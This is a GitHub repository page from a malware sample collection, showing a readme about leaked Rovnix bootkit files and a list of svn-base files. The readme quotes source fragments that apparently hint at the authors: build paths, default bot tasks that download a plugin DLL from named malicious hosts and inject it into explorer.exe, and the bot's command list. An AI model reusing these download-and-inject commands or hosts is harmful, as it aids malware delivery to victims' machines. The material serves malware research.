malware-1/Rovnix/_DUMP at master · gabyavra/malware-1

History

readme.txt

#Dump

Contains some .svn files which may contain more clues to the creators etc.

Example of found so far:

MAKEDIR_LOWERCASE=e:\projects\progs\petrosjan\bootkit\kbot
OBJ_PATH=e:\projects\progs\petrosjan\bootkit\kbot

//#define	szDefaultTask	"LOAD_FILE http://shaparack.com/img/admin/bot.plug BT.DLL\r\nSET_INJECT BT.DLL explorer.exe\r\n"
//#define	szDefaultTask	"LOAD_FILE http://56tgvr.info/geter/getFile.php BT1.DLL\r\nLOAD_FILE http://56tgvr.info/geter/bot.plug BT.DLL\r\nSET_INJECT BT.DLL explorer.exe\r\n"
#define	szDefaultTask	"LOAD_FILE http://56tgvr.info/geter/getFile.php BT.DLL\r\nSET_INJECT BT.DLL explorer.exe\r\n"
//#define	szDefaultTask	"LOAD_FILE http://az2.zika.in/rt_jar/bot.plug BT.DLL\r\nSET_INJECT BT.DLL explorer.exe\r\n"
//#define	szDefaultTask	"LOAD_FILE http://security-checking.org/rt_jar/bot.plug BT.DLL\r\nSET_INJECT BT.DLL explorer.exe\r\n"

#define		KBOT_DEFAULT_HOST_LIST	" 10.30.29.241 "



// Supported commands
// Note that command names are case-sensitive, but command parameters are not.

// LOAD_FILE http://myhost.com/myfile.dll myfile32.dll	- downloads file http://myhost.com/myfile.dll and saves it to the VFS 
//	as \MYFILE32.DLL
// DELETE_FILE	myfile32.dll							- deletes file \MYFILE32.DLL from the VFS
// SET_INJECT	myfile32.dll explorer.exe iexplore.exe	- requests the KLOADER to inject \MYFILE32.DLL into the specified processes
// READ_FILE \??\C:\myfile.dll myfile.dll				- ?????? ????? ? ?????

// $Date: 2012-02-20 18:55:12 +0400 (??, 20 ??? 2012) $

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

_DUMP

_DUMP

readme.txt

Name		Name	Last commit message	Last commit date
parent directory ..
0189830fee0864366db1b5605c466a4e5b055992.svn-base		0189830fee0864366db1b5605c466a4e5b055992.svn-base
08a5fa2d9015f0c83e14bd598d20220736ad8c96.svn-base		08a5fa2d9015f0c83e14bd598d20220736ad8c96.svn-base
1f33854ad0472d1cab56b394a5d99ce056469b6d.svn-base		1f33854ad0472d1cab56b394a5d99ce056469b6d.svn-base
38eba669e7f65f690d0f9636c1d450223f382b55.svn-base		38eba669e7f65f690d0f9636c1d450223f382b55.svn-base
7aa3977f419f2d8cd8e28c20a6e9e483f2482598.svn-base		7aa3977f419f2d8cd8e28c20a6e9e483f2482598.svn-base
a00c81cdc72e6720ecb82349ae1166614853e05c.svn-base		a00c81cdc72e6720ecb82349ae1166614853e05c.svn-base
a07f4bbbb21ca550a63641c413660e0f27cdff00.svn-base		a07f4bbbb21ca550a63641c413660e0f27cdff00.svn-base
a57f6b893f4ed542a67bb36ff2c1b9eb3616894d.svn-base		a57f6b893f4ed542a67bb36ff2c1b9eb3616894d.svn-base
acb825dea26f9d507358df3cfd5842da35421bf7.svn-base		acb825dea26f9d507358df3cfd5842da35421bf7.svn-base
d22b5fccfd1d2dfa72dde85bd2eaef39ff2b795e.svn-base		d22b5fccfd1d2dfa72dde85bd2eaef39ff2b795e.svn-base
d5c1d6905845df042a43e0c0db166725bac4ea70.svn-base		d5c1d6905845df042a43e0c0db166725bac4ea70.svn-base
e19909da33e75132d50f2bef8a222ba4ad243aeb.svn-base		e19909da33e75132d50f2bef8a222ba4ad243aeb.svn-base
e3424d3927016883e3a9c8036856f8643f2089f2.svn-base		e3424d3927016883e3a9c8036856f8643f2089f2.svn-base
e4c23fad23de4586c1770b2be5df0ed2726df970.svn-base		e4c23fad23de4586c1770b2be5df0ed2726df970.svn-base
e96f819fc48f397dd8b5c1f5d4a54abfb12d730f.svn-base		e96f819fc48f397dd8b5c1f5d4a54abfb12d730f.svn-base
ed66ad26d6c472a1b42290deb2f169a2b3dfc424.svn-base		ed66ad26d6c472a1b42290deb2f169a2b3dfc424.svn-base
f0923275b362e3a05ac77fcb6d3a12e18cdcfad9.svn-base		f0923275b362e3a05ac77fcb6d3a12e18cdcfad9.svn-base
readme.txt		readme.txt

Files

_DUMP

Directory actions

More options

Directory actions

More options

Latest commit

History

_DUMP

Folders and files

parent directory

readme.txt